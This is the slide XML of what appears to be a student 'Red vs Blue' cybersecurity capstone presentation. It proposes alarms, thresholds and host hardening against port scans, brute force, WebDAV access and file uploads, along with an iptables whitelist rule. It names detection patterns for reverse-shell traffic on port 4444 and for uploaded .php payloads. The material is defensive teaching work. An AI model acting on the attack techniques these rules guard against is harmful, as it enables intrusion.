              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Threshold for this could be if any IP address requests more than 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> in a minute on any of these ports. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4455275" y="14080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300"/>
              <a:t>What configurations can be set on the host to mitigate port scans? </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Highly confidential folders should not be shared for public access.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Rename folders containing sensitive/private/critical company data.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Encrypt data contained within confidential folders.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Whitelist or block IP address that cause an alert to trigger  </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Using and IDS like Splunk or Kibana helps with alerting of port scan activity. Better response times to threats. </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4" name="Google Shape;1224;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5" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1443975"/>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300"/>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>An alarm can be set to trigger if a request is made for the secret_folder from outside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>company’s internal network.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- Also an alarm should trigger if the folders are accessed multiple times by the same IP address. This traffic should be prevented  as an attacker may be testing the directories for access. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>I would recommend a threshold of maximum 5 attempts per hour from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>single IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> that would trigger the alert to be sent. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Google Shape;1226;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4476850" y="1443975"/>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300"/>
              <a:t>What configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Highly confidential folders should not be shared for public access.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- Increase password and username strength for users with access to hidden directories.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- Encrypt data contained within confidential folders.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- Review IP addresses that cause an alert to be sent: either whitelist or block the IP addresses.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> of permitted IP addresses.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- Change the permissions to make it private.</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32" name="Google Shape;1232;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3" name="Google Shape;1233;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300"/>
              <a:t>What kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Set an alarm that alerts for whenever a 401 error is returned. It should also trigger an alert when multiple failed authentication attempts are made by a single user.  </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b="1" lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>For all users when 3 failed login attempts are made within 1 hour it should trigger an alert, but a critical alert if more than 10 failed attempts are made. </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sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4506975" y="14618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300"/>
              <a:t>What configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Creation of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>lockout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> policy that locks a user out for 30 minutes after 5 failed authentication attempts and increases the lockout time after subsequent failed attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Describe the solution. If possible, provide the required command line(s).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Consider multi-factor authentication. Enforce password strength requirements, and new passwords every 6 month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>s. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Create a list of blocked IP addresses that have more than 50 failed attempts in a month. To prevent future BFA attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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40" name="Google Shape;124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1" name="Google Shape;1241;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300"/>
              <a:t>What kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>An alarm should be created to trigger if the WebDAV directory is accessed from an IP address outside the company’s internal network.</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b="1" lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Activate whenever a HTTP PUT request is made by an external IP address. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="46047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300"/>
              <a:t>What configuration can be set on the host to control access? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Limit user access to WebDAV by creating a whitelist that only allows specified IP addresses access. Ensure users with access to WebDAV have complex username and passwords.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b="1" lang="en" sz="1300"/>
              <a:t>Describe the solution. Creating a whitelist of trusted IP addresses and ensure firewall security prevents all other access</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Within Ubuntu I would run the command:                </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>iptables -I INPUT -s 192.168.1.1 -p tcp -m multiport --dports 80,443 -j ACCEPT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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48" name="Google Shape;1248;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9" name="Google Shape;1249;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14618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300"/>
              <a:t>What kind of alarm can be set to detect future file uploads? </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>I recommend that an alert be set for any traffic attempting to access port 4444.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>I also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>recommend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> setting an alert for any files being uploaded into the /webDAV folder. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>threshold for both situations should be when one or more attempt is made. Alert should also trigger if the file comes from the internal network and has a suspicious name, such as “xxxx.php”</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="14618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a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Block all IP addresses other than whitelisted IP addresses (because reverse shells can be created over DNS, this action will only limit the risk of reverse shell connections, not eliminate the risk)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- Set access to the /webDAV folder to read only to prevent payloads from being uploaded</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- Ensure only necessary ports are open</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>- Validate the file type before uploading it to the server and block all executables.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>By validating the file, it is possible to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> extension spoofing, which is used to conceal the file type.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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10.0.0.1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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: Red vs Blue - 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OS:Kali GNU (Linux 5.4.0)</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Ubuntu 18.04.1 LTS </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 18.04.1 LTS	</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87261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 Azure Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> V </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Team </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382675" y="966875"/>
            <a:ext cx="6256082" cy="3784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{499D4502-2CF4-4DBF-8ED5-DE3039875F61}</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ML-REFVM-684427 (Hyper-V Azure Machine)</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>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Host Machine Cloud based</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sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Network Monitoring Machine running Kibana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sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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192.168.1.105 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open port 80/tcp Open port 22/tcp</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Target Machine </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>replicating a vulnerable server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>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87325" y="1078313"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
